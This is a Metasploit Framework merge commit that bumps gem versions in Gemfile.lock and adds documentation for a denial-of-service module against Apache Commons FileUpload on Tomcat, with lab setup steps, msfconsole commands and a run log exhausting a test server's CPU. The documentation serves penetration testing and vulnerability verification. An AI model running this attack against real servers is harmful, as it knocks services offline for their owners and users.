Merge remote-tracking branch 'upstream/master' into land-7847-

Author: Brent Cook

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.13.15)
+    metasploit-framework (4.13.16)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -14,7 +14,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.6)
+      metasploit-payloads (= 1.2.8)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.1.6)
       msgpack
@@ -30,7 +30,7 @@ PATH
       pcaprub
       pg
       railties
-      rb-readline-r7
+      rb-readline
       recog
       redcarpet
       rex-arch (= 0.1.4)
@@ -103,7 +103,7 @@ GEM
       thor (~> 0.19)
     bcrypt (3.1.11)
     bit-struct (0.15.0)
-    builder (3.2.2)
+    builder (3.2.3)
     capybara (2.11.0)
       addressable
       mime-types (>= 1.16)
@@ -132,7 +132,7 @@ GEM
       nokogiri (~> 1.5)
       railties (>= 3, < 5.1)
     cucumber-wire (0.0.1)
-    diff-lcs (1.2.5)
+    diff-lcs (1.3)
     docile (1.1.5)
     erubis (2.7.0)
     factory_girl (4.8.0)
@@ -142,13 +142,13 @@ GEM
       railties (>= 3.0.0)
     faraday (0.11.0)
       multipart-post (>= 1.2, < 3)
-    ffi (1.9.16)
+    ffi (1.9.17)
     filesize (0.1.1)
     fivemat (1.3.2)
     gherkin (4.0.0)
     i18n (0.7.0)
-    jsobfu (0.4.1)
-      rkelly-remix (= 0.0.6)
+    jsobfu (0.4.2)
+      rkelly-remix
     json (1.8.6)
     loofah (2.0.3)
       nokogiri (>= 1.5.9)
@@ -169,7 +169,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.6)
+    metasploit-payloads (1.2.8)
     metasploit_data_models (2.0.13)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -233,8 +233,8 @@ GEM
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
     rake (12.0.0)
-    rb-readline-r7 (0.5.2.0)
-    recog (2.1.3)
+    rb-readline (0.5.3)
+    recog (2.1.4)
       nokogiri
     redcarpet (3.4.0)
     rex-arch (0.1.4)
@@ -257,7 +257,7 @@ GEM
       rex-encoder
       rex-text
     rex-java (0.1.3)
-    rex-mime (0.1.1)
+    rex-mime (0.1.3)
       rex-text
     rex-nop (0.1.0)
       rex-arch
@@ -275,14 +275,14 @@ GEM
       rex-text
     rex-socket (0.1.3)
       rex-core
-    rex-sslscan (0.1.1)
+    rex-sslscan (0.1.2)
       rex-socket
       rex-text
     rex-struct2 (0.1.0)
-    rex-text (0.2.10)
+    rex-text (0.2.11)
     rex-zip (0.1.1)
       rex-text
-    rkelly-remix (0.0.6)
+    rkelly-remix (0.0.7)
     robots (0.10.1)
     rspec-core (3.5.4)
       rspec-support (~> 3.5.0)
@@ -323,10 +323,10 @@ GEM
       thread_safe (~> 0.1)
     tzinfo-data (1.2016.10)
       tzinfo (>= 1.0.0)
-    windows_error (0.0.2)
+    windows_error (0.1.0)
     xpath (2.0.0)
       nokogiri (~> 1.3)
-    yard (0.9.7)
+    yard (0.9.8)
 
 PLATFORMS
   ruby

documentation/modules/auxiliary/dos/http/apache_commons_fileupload_dos.md

@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.50/bin/apache-tomcat-7.0.50.exe)
+3. Download the example [multipart form war file](https://github.com/rapid7/metasploit-framework/files/712278/sample-multipart-form.zip)
+4. Unzip sample-multipart-form.zip && cd sample-multipart-form
+  1. If Compiling: `mvn clean package`
+5.  `cp target/sample-multipart-form.war $TOMCAT-7.0.50/webapps/`
+6. Start Tomcat (linux: `$TOMCAT-7.0.50/bin/startup.sh`)
+7. Check if the webapp is running: `http://localhost:8080/sample-multipart-form/multipartForm`
+
+## Verification Steps
+
+  1. Install Tomcat, and the vulnerable form
+  2. Start msfconsole
+  3. Do: ```use auxiliary/dos/http/apache_commons_fileupload_dos```
+  4. Do: ```set rhost <rhost>```
+  5. Do: ```set TARGETURI <uri>```
+  6. Do: ```run```
+  7. Tomcat should be utilizing 99%+ of the CPU
+
+## Options
+
+  **TARGETURI**
+
+  The URI where the multipart form is located.  There is no real default and this will change based on the application.
+
+## Scenarios
+
+Scenario uses the sample multipart form provided in this documentation, against Tomcat 7.0.50 on a Windows XP system.
+
+```
+msf exploit(handler) > use auxiliary/dos/http/apache_commons_fileupload_dos
+msf auxiliary(apache_commons_fileupload_dos) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf auxiliary(apache_commons_fileupload_dos) > set rport 8087
+rport => 8087
+msf auxiliary(apache_commons_fileupload_dos) > set TARGETURI /sample-multipart-form/multipartForm
+TARGETURI => /sample-multipart-form/multipartForm
+msf auxiliary(apache_commons_fileupload_dos) > run
+
+[*] Sending request 1 to 192.168.2.108:8087
+[*] Sending request 2 to 192.168.2.108:8087
+[*] Sending request 3 to 192.168.2.108:8087
+[*] Sending request 4 to 192.168.2.108:8087
+[*] Sending request 5 to 192.168.2.108:8087
+[*] Sending request 6 to 192.168.2.108:8087
+[*] Sending request 7 to 192.168.2.108:8087
+[*] Sending request 8 to 192.168.2.108:8087
+[*] Sending request 9 to 192.168.2.108:8087
+[*] Sending request 10 to 192.168.2.108:8087
+[*] Sending request 11 to 192.168.2.108:8087
+[*] Sending request 12 to 192.168.2.108:8087
+[*] Sending request 13 to 192.168.2.108:8087
+[*] Sending request 14 to 192.168.2.108:8087
+[*] Sending request 15 to 192.168.2.108:8087
+[*] Sending request 16 to 192.168.2.108:8087
+[*] Sending request 17 to 192.168.2.108:8087
+[*] Sending request 18 to 192.168.2.108:8087
+[*] Sending request 19 to 192.168.2.108:8087
+[*] Sending request 20 to 192.168.2.108:8087
+[*] Sending request 21 to 192.168.2.108:8087
+[*] Sending request 22 to 192.168.2.108:8087
+[*] Sending request 23 to 192.168.2.108:8087
+[*] Sending request 24 to 192.168.2.108:8087
+[*] Sending request 25 to 192.168.2.108:8087
+[*] Sending request 26 to 192.168.2.108:8087
+[*] Sending request 27 to 192.168.2.108:8087
+[*] Sending request 28 to 192.168.2.108:8087
+[*] Sending request 29 to 192.168.2.108:8087
+[*] Sending request 30 to 192.168.2.108:8087
+[*] Sending request 31 to 192.168.2.108:8087
+[*] Sending request 32 to 192.168.2.108:8087
+[*] Sending request 33 to 192.168.2.108:8087
+[*] Sending request 34 to 192.168.2.108:8087
+[*] Sending request 35 to 192.168.2.108:8087
+[*] Sending request 36 to 192.168.2.108:8087
+[*] Sending request 37 to 192.168.2.108:8087
+[*] Sending request 38 to 192.168.2.108:8087
+[*] Sending request 39 to 192.168.2.108:8087
+[*] Sending request 40 to 192.168.2.108:8087
+[*] Sending request 41 to 192.168.2.108:8087
+[*] Sending request 42 to 192.168.2.108:8087
+[*] Sending request 43 to 192.168.2.108:8087
+[*] Sending request 44 to 192.168.2.108:8087
+[*] Sending request 45 to 192.168.2.108:8087
+[*] Sending request 46 to 192.168.2.108:8087
+[*] Sending request 47 to 192.168.2.108:8087
+[*] Sending request 48 to 192.168.2.108:8087
+[*] Sending request 49 to 192.168.2.108:8087
+[*] Sending request 50 to 192.168.2.108:8087
+[*] Auxiliary module execution completed
+```
+
+ ![tomcat7_dos](https://cloud.githubusercontent.com/assets/752491/22169486/71980e2e-df42-11e6-8353-4f1e260375ee.png)
+